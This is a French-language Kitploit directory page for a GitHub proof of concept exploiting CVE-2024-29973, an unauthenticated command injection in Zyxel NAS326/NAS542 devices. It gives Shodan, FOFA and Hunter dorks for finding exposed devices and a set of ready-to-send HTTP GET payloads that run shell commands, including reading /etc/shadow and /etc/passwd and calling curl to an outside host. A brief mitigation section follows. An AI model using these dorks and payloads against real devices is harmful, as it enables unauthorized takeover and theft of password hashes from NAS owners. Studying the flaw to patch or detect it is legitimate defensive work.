Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-29973 | Kitploit
Outils/GitHubGitHub/kernel364/cve-2024-29973
Sécurité des Systèmes EmbarquésAnalyse des VulnérabilitésExploitationExploitation d'Applications WebExfiltration de DonnéesCollecte d'Informations
GitHubkernel364/cve-2024-29973

CVE-2024-29973

Voir le dépôt
21il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-29973 - Vulnérabilité d'injection de commandes à distance

Description

CVE-2024-29973 est une vulnérabilité critique présente dans certains appareils réseau Zyxel. Cette vulnérabilité permet à un attaquant non authentifié d'exécuter des commandes arbitraires sur l'appareil cible en exploitant des mécanismes de validation d'entrée insuffisants dans le firmware. Les attaquants peuvent envoyer des requêtes HTTP spécialement conçues à l'appareil, injecter des commandes système et potentiellement prendre le contrôle total de l'appareil.

Dorks

Hunter: product.name="ZyXEL NAS542"||product.name="ZyXEL NAS326" FOFA: app="NAS542" || app="ZYXEL-NAS326" SHODAN: http.title:"Zyxel NAS326"

Comment ça fonctionne

Injection de commande : La vulnérabilité provient d'un assainissement insuffisant des entrées dans l'une des interfaces web de l'appareil. Cette faille permet aux attaquants d'ajouter des commandes du système d'exploitation dans les paramètres des requêtes HTTP.

Exemple d'exploitation : Les attaquants peuvent injecter des commandes via une requête HTTP GET, comme celle ci-dessous, pour exécuter du code arbitraire :

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("id",+shell=True)%23 HTTP/1.1

Impact : Une exploitation réussie permet d'exécuter des commandes système, ce qui peut conduire à une prise de contrôle à distance de l'appareil, à une fuite de données ou à un compromis supplémentaire du réseau.

Prévention

Pour atténuer les risques associés à cette vulnérabilité, suivez ces étapes :

Mise à jour du firmware : Assurez-vous que tous les appareils Zyxel sont mis à jour avec la dernière version du firmware. Zyxel a publié des correctifs qui traitent cette vulnérabilité. Vérifiez régulièrement les mises à jour et appliquez-les rapidement.

Segmentation du réseau : Isolez les appareils vulnérables de l'infrastructure réseau critique. N'exposez que les services nécessaires et assurez-vous que les interfaces d'administration ne sont pas accessibles publiquement.

Configuration du pare-feu : Limitez le trafic entrant et sortant aux seuls services essentiels. Bloquez tout accès HTTP inutile aux appareils Zyxel.

Surveillance des activités suspectes : Mettez en place des outils de journalisation et de surveillance capables de détecter et d'alerter sur tout comportement inhabituel, comme des tentatives de connexion répétées ou des schémas de trafic anormaux.

Références National Vulnerability Database - CVE-2024-29973 Zyxel Security Advisory

Images

alt text

POC

/etc/passwd

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/passwd",+shell=True)%23 HTTP/1.1

/etc/shadow

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/shadow",+shell=True)%23 HTTP/1.1

ifconfig

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("curl+ifconfig.me",+shell=True)%23 HTTP/1.1

hostname

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("hostname",+shell=True)%23 HTTP/1.1

ip

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("ip+a",+shell=True)%23 HTTP/1.1

uname -a

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("uname+-a",+shell=True)%23 HTTP/1.1

/etc/group

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/group",+shell=True)%23 HTTP/1.1
Télécharger l’outil